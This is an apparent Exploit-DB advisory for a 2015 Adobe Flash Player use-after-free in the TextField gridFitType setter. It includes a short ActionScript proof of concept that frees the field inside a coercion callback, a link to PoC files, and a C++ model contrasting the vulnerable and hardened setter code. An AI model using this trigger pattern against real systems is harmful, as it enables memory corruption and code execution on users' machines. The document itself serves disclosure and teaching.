Vendor: Flash Player
By: Natalie Silvanovich
CVSS: 9.3 (HIGH)
CWE: 416 (Use-after-Free)
Product Name: Flash Player
Affected Version From: Adobe Flash Player 18.0.0.194 and earlier
Affected Version To: Adobe Flash Player 18.0.0.203 and earlier
Patch Exists: YES
Related CWE: CVE-2015-7645
CPE: o:adobe:flash_player:18.0.0.194
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
Year: 2015

Use-after-Free in TextField gridFitType setter

A use-after-free vulnerability exists in the TextField gridFitType setter in Adobe Flash Player. The vulnerability is caused by a race condition when the TextField object is removed while the gridFitType setter is being called. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user.

Mitigation:

Upgrade to the latest version of Adobe Flash Player.
Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=418&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

There is a use-after-free in the TextField gridFitType setter. A PoC is below:

// ActionScript 2 PoC: create a TextField whose gridFitType setter coerces its argument to a string
var test = this.createTextField("test", 1, 0, 0, 100, 100);
// Object whose string/number coercion runs func() while the setter is still executing
var n = {toString : func, valueOf : func};
test.gridFitType = n;

function func(){
	// Remove (free) the TextField from inside the coercion callback, while the setter still holds it
	test.removeTextField();
	// Churn the heap while the setter is suspended in this callback
	for(var i = 0; i < 1000; i++){
		var b = new flash.display.BitmapData(1000, 1000, true, 10);
	}
	trace("here");
	return "natalie";
}

A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition; additional SWFs are attached.
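As an added example (not part of the report above and not Flash Player's code), a C++ model of the setter shape the PoC abuses: the vulnerable form borrows a raw pointer across the script callback that coerces the argument, while the hardened form pins the object with a strong reference for the whole call. TextField, Stage, ScriptValue and runPoc are constructed stand-ins, and the weak_ptr check in the vulnerable form replaces the real dangling write so the example runs safely.

```cpp
#include <functional>
#include <memory>
#include <string>

// Constructed model of the native TextField object.
struct TextField {
    std::string gridFitType = "none";
};

// The display list owns the field. removeTextField() drops the only strong
// reference, which plays the role of the free in the original report.
struct Stage {
    std::shared_ptr<TextField> field = std::make_shared<TextField>();
    void removeTextField() { field.reset(); }
};

// A script value whose string coercion runs arbitrary script (the PoC's toString/valueOf).
using ScriptValue = std::function<std::string()>;

// Vulnerable shape: the setter keeps only a borrowed raw pointer while it runs
// script. The weak_ptr check stands in for the real use-after-free so the example
// stays memory-safe; an engine without it writes through the dangling pointer.
bool setGridFitTypeVulnerable(Stage& stage, const ScriptValue& value) {
    TextField* raw = stage.field.get();           // no ownership taken
    std::weak_ptr<TextField> observer = stage.field;
    std::string coerced = value();                // re-enters script; may remove the field
    if (observer.expired()) return false;         // dangling: the write below would be a UAF
    raw->gridFitType = coerced;
    return true;
}

// Hardened shape: hold a strong reference for the whole call, so a
// removeTextField() inside the coercion cannot free the object under this frame.
bool setGridFitTypeHardened(Stage& stage, const ScriptValue& value) {
    std::shared_ptr<TextField> self = stage.field; // keeps the object alive
    if (!self) return false;
    std::string coerced = value();
    self->gridFitType = coerced;                  // safe even if the stage dropped it
    return true;
}

// Reproduces the PoC's callback: remove the field from inside the coercion.
// Returns true when the setter completed without touching a freed object.
bool runPoc(bool hardened) {
    Stage stage;
    ScriptValue n = [&stage]() { stage.removeTextField(); return std::string("natalie"); };
    return hardened ? setGridFitTypeHardened(stage, n) : setGridFitTypeVulnerable(stage, n);
}
```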

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37877.zip